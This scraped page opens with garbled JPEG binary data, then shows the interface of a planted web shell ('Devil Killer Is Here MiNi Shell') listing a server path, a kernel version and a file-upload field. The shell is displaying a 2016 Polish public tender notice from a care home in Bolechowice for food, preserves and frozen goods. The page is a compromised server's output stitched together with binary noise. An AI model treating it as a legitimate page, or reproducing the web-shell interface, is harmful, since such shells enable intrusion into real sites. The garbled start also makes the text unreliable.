JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161130/354991-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://dpswieckowice.pl' target='_blank'>http://dpswieckowice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 354991 - 2016
              z dnia 2016-11-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bolechowice: Dostawy artykułów spożywczch<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej, krajowy numer identyfikacyjny
              29792200000, ul.
              Więckowice, ul. Słoneczna 
              3,
              32082  
              Bolechowice, woj.
              małopolskie, państwo
              Polska, tel.
              122 851 603, e-mail
              wieckowicezam@poczta.onet.pl, faks
              122 852 010.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />dpswieckowice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście, począ, firmą kurierską<br />
                Adres:
                <br />Dom Pomocy Społocznej, pokój Działu Administracyjno-Gospodarczego, ul. Słoneczna 3, 32-082 Więckowwice </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawy artykułów spożywczch<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ  I  artykuły spożywcze sypkie 
Lp	Nazwa
artykułu	Jedn.
miar	Ilość

1	Andruty-wafle cukrzycowe op. do 110g	kg	50
2	Budyń bez cukru  śmietankowy, waniliowy, czekoladowy, malinowy  op.do 1 kg	kg	135
3	Bulion drobiowy Winiary op. do 2 kg	kg	4
4	Chrupki krakowskie a 350 g	szt. 	175
5	Ciastka deserowe różne, których termin przydatności do spożycia wynosi min. 14 dni a max 45 dni od daty produkcji	kg	160
6	Ciastka herbatniki szkolne	kg	110
7	Ciastka krakersy Lajkonik lub równoważne o wart. energetycznej 476 kcal,
21 g tłuszczu, 62 g węglowodanów na 100g,  op . - 180 g 	kg.	30
8	Ciastka typu Grześki w czekoladzie a 36 g	kg	65
9	Cukier a 1 kg			kg	2500
10	Cukier puder a 0,5 kg	kg	70
11	Cukier waniliowy op. do 1 kg	kg	6,5
12	Cukierki w czekoladzie  mieszanka krakowska	kg	14
13	Cynamon op. do 1kg	kg	1,5
14	Czekolada dla diabetyków a 100 g	kg.	70
15	Czosnek granulowany op. do 1 kg	kg	17
16	Drożdże piekarskie  op  do 100 g	kg	8
17	Galaretka owocowa op. do 1 kg, o zawartości żelatyny wieprzowej, smak: truskawkowy wiśniowy ,brzoskwiniowy, agrestowy itp	kg	210
18	Herbata ekspres. Owocowa ze sznurkiem różne smaki  Vitax op. po 20 szt.	op.	350
19	Herbata liściasta Madras op.do 1 kg	kg	130
20	Kakao Wawel extra lub równoważne op. 100g, sypkie , b/cukru , ciemne niskotłuszczowe o zaw. 10-12% w 100g suchej masy	kg	13
21	Kasza jęczmienna sypka , średnia  op. do 1 kg	kg	210
22	Kasza manna sypka ,  op. do 1 kg	kg	115
23	Kawa zbożowa Kujawianka lub równoważna op.do 0,5 kg składniki: żyto prażone 60%, Jęczmień 20%, cykoria , burak prażony	kg	150
24	Ketchup Roleski lub równoważny  łagodny , op plastikowe do 0,5 kg, gęsty produkowany z pomidorów(205 g pomidorów w 100 g ketchupu), o intensywnej czerwonej barwie, b/konserwantów, zagęstników i dodatków E	kg	90
25	Ketchup Roleski lub równoważny  pikantny , op plastikowe do 0,5 kg, gęsty produkowany z pomidorów(205 g pomidorów w 100 g ketchupu), o intensywnej czerwonej barwie, b/konserwantów, zagęstników i dodatków E	kg	90
26	Kisiel bez cukru op. do 1 kg smak: malinowy , wiśniowy , truskawkowy, ctrynowy, morelowy,  itp	kg	125
27	Kleik ryżowy błyskawiczny Bobovita lub równoważny a 200 g , zawierający 99,9% mąki ryżowej  	kg	25
28	Kminek op. do 1 kg	kg	1
29	Konserwa rybna śledź w pomidorach op.  300 -330g , zawartość śledzia min. 55% w 100 g produktu	kg	45
30	Konserwa rybna śledź w oleju op.  300 -330g , zawartość śledzia min. 55% w 100 g produktu	kg	45
31	Kwasek cytrynowy op. do 1 kg	kg	16
32	Liście laurowe op do 1 kg	kg	1,3
33	Majeranek op do 0,2 kg	kg	1,5
34	Majonez Roleski lub równoważny op. do 1 kg , stołowy o zawartości tłuszczu nie mniej niż 51% i jaj kurzych nie mniej niż 11% gęsty , b/konserwantów , barwa kremowa	kg	340
35	Makaron drobny 4-ro jajeczny , wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg	kg	240
36	Makaron nitki 4-ro jajeczny  wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg     	kg	200
37	Makaron różny 4-ro jajeczny wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg op. 	kg	400
38	Makaron łazanki 4-ro jajeczny wysokiej jakości  zachowujący kształt po ugotowaniu op. a 05 kg op.	kg	100
39	Makrela wędzona	kg	150
40	Mąka pszenna tortowa op. do 1 kg typ 450, sypka ,barwa jasno kremowa	kg	1950
41	Mąka ziemniaczana op. do 1 kg	kg	80
42	Miód naturalny wielokwiatowy płynny op. do 400g	kg	60
43	Musztarda delikatesowa Roleski  lub równoważna op. do 0,5 kg, b/konserwantów , zagęstników , stabilizatorów i dodatków E	kg	60
44	Ocet 10 % op. do 0,5 l	l	30
45	Olej butelka do 1 l , roślinny z pierwszego tłoczenia ,o niskiej zawartości kwasu erukowego , nadający się do pieczenia i smażenia	l	420
46	Oregano opak do 50g	kg	0,5
47	Paluszki słone Lajkonik lub równoważne , mające 374 kcal  op do300 g	kg 	110
48	Pieprz czarny mielony op. do 1 kg	kg	15
49	Płatki kukurydziane Corn Flakes op. do 1 kg b/dodatków smakowych	kg	75
50	Płatki owsiane górskie , barwa swoista dla produktu op. 0,5 - 1 kg klasa I	kg	145
51	Proszek do pieczenia op. do 50 g	kg	2
52	Przyprawa do drobiu złocista Kamis  lub równoważna op. do 1 kg o zawartości: sól ,papryka słodka,14%,gorczyca biała, czosnek 5,8%,kolendra, kurkuma, koziradka2,4%,chili2%, imbir ,cynamon ,kmin ,goździki ,gałka muszkatałowa 	kg	3,5
53	Przyprawa do mięsa Kamis lub równoważna  op. do 1 kg o zawartości : sól , czosnek ,gorczyca ,kminek ,kolendra ,papryka słodka ,majeranek, rozmaryn, chili, czomber	kg	1,3
54	Przyprawa do potraw Kucharek lub równoważna op. do 1 kg, o zawartości
min 15,5% suszonych warzyw	kg	75
55	Przyprawa w płynie do zup Winiary a 1 l	l	200
56	Rodzynki op. od 0,5 do 1 kg , owoce średniej wielkości typu sułtańskie	kg	31
57	Ryż barwa biała , długoziarnisty ,  op. do 1 kg , klasa I	kg	470
58	Sól kuchenna jodowana op. do 1 kg	kg	630
59	Śledzie solone Matjas op. do 3 kg po odcieku 2 kg	kg	100
60	Śledzie solone Matjas op. do 5 kg po odcieku 4 kg	
kg	100
61	Śmietanka śnieżka op. do 60 g	kg	20
62	Śliwki suszone bez pestek op do 250g	kg	8
63	Wiórka kokosowe op. do 100 g	kg	13
64	Ziele angielskie op. do 1 kg	kg	3
65	Żelatyna spożywcza wieprzowa op. do 1 kg	kg	40

CZĘŚĆ II  przetwory owocowe i warzywne
Lp	Nazwa
artykułu	Jedn.
miar	Ilość

1	Barszcz biały kiszony z mąki żytniej  op do 0,5 l butelki	l	160
2	Barszcz czerwony koncentrat Krakus lub równoważny op do 0,3 l zawierający zagęszczony sok  z buraka  czer. 59,2%	l	64
3	Brzoskwinie w syropie a 850g w puszce ,bez pestek krojone w połówki	szt	25
4	Chrzan tarty Polonais op 200g min 62 % chrzanu ,102kcal, tłuszczu 07g,białko2,7g na100g produktu lub równoważny	kg	130
5	Dżem bez cukru op do 400 g z kawałkami owoców różne smaki, b/konserwantów min 40% owoców	kg	330
6	Groszek konserw.op.do 400 g z otwieraczem, sałatkowy średnie ziarna	kg	165
7	Koncent pomidorowy 30%Pudliszki ze świeżych pomidorów b/żadnych dodatków min104 kcal, tłuszcz 0,8g, węglowod. 18 g   op do 1 kg lub równoważny	kg	180
8	Koncent pomidorowy 28 -30%Pudliszki ze świeżych pomid. op do 200g b/żadnych dodatków min104 kcal, tłuszcz 0,8g, węglowod. 18 g ,   lub równoważny	kg	60
9	Kukurydza konser.op.do 400gz otwieraczem , sałatkowa, półsłodka	kg	205
10	Marmolada owocowa  twarda o smaku różanym op do 1 kg	kg	6
11	Papryka konserw. czerwona półsłodka op do 1 l	kg	220
12	Pieczarki marynowane. op do 1l grzyby całe w zalewie octowej	kg	180
13	Sałatka szwedzka o. kapusty p do 1 l	kg	220
14	Sałatka z czerwonej kapusty  z dod. jabłka o smaku łagodnym op do 1 l	kg	80
15	Sok pomarańczowy100%  zagęszczonego soku pomarańcz. w 100 ml.45 kcal, wit.C 6 mg op 200 ml TYMBARK lub równoważny.	l	205
16	Nektar czarna porzeczka  zaw. sok z czarnych porzeczek z zagęszczonego soku  min.(25%) , zaw. w 100 ml 49 kcal,wit. C 6 mg. TYMBARK lub równoważny
 a 1 l.
	l	325
17	Sok pomarańcz. 100% z zagęszczonego soku pomarańcz zaw.w100 ml.45kcal 
wit. C 6 mg TYMBARK lub równoważny op 1 l	l	300
18	Sok multiwitamina z zagęszczonych soków z: jabłek (60%) i pomarańczy (22%), sok z marchwi z zagęszczonego soku (12%), przeciery z: bananów (3%), brzoskwiń, gujawy i papai, soki z zagęszczonych soków z: ananasów (2%), mango (0,5%), marakui (0,1%), liczi (0,05%), figi kaktusowej, kiwi i limonek, zaw. w 100 ml.51 kcal, wit. C-12 mg. - TYMBARK lub równoważny opak.1 l.
	l	325
19	Sok jabłkowy 100 %  z zagęszczonego soku jabłkowego zaw. w 100 ml. 43 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 1 l.
	l	300
20	Syrop o smaku malinowym, wysokosłodzony,  pasteryzowany, bez substancji konserwujących zaw. min.3% zagęszczonego soku malinowego
	l	110

CZĘŚĆ  III  mrożonki

Lp	Nazwa
artykułu	Jedn.
miar	Ilość

1	Borówki mrożone opak.do 2,5 kg	kg	100
2	Brokuły różyczki pakowane 2000-2500 g	kg	70
3	Brukselka mrożona  op. do 2,5 kg	kg	60
4	Fasola szparagowa mrożona zielona op do 2,5 kg	kg	95
5	Fasola szparagowa mrożona żółta op do 2,5 kg	kg	95
6	Filet z dorsza mrożony bez skóry SHP( bez glazury)barwa biała	kg	150
7	Filet z mintaja mroż. b/skóry SHP( bez glazury)barwa biała	kg	350
8	Filet z morszczuka mrożony b/skóry SHP(bez glazury)	kg	350
9	Groszek mrożony zielony op. do 2,5 kg 	kg	85
10	Kalafior mrożony różyczki op. 2000-2500 g	kg	240
11	Lody wielosmakowe op. do 150g	l	120
12	Mieszanka kompotowa mrożona   5-cio składnikowa .op do 10 kg	kg	2520
13	Szpinak mrożony  mielony  op. do 2,5 kg	kg	200
14	Śliwy b/pestek mrożone  op. do 2,5 kg	kg	120
15	Truskawki    mrożone op. do 2,5 kg	kg	310

<br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 03/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                - są zarejestrowanymi w KRS  lub ewidencji działalności gospodarczej,<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                - są w sytuacji ekonomicznej i finansowej pozwalającej na realizację zamówienia, <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                - dysponują potencjałem technicznym tj.  pomieszczeniami, urządzeniami i wyposażeniem 
  oraz środkiem transportu umożliwiającymi zrealizowanie zamówienia zgodnie z 
  obowiązującym prawem, 
- dysponują osobami zdolnymi do wykonania zamówienia, 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
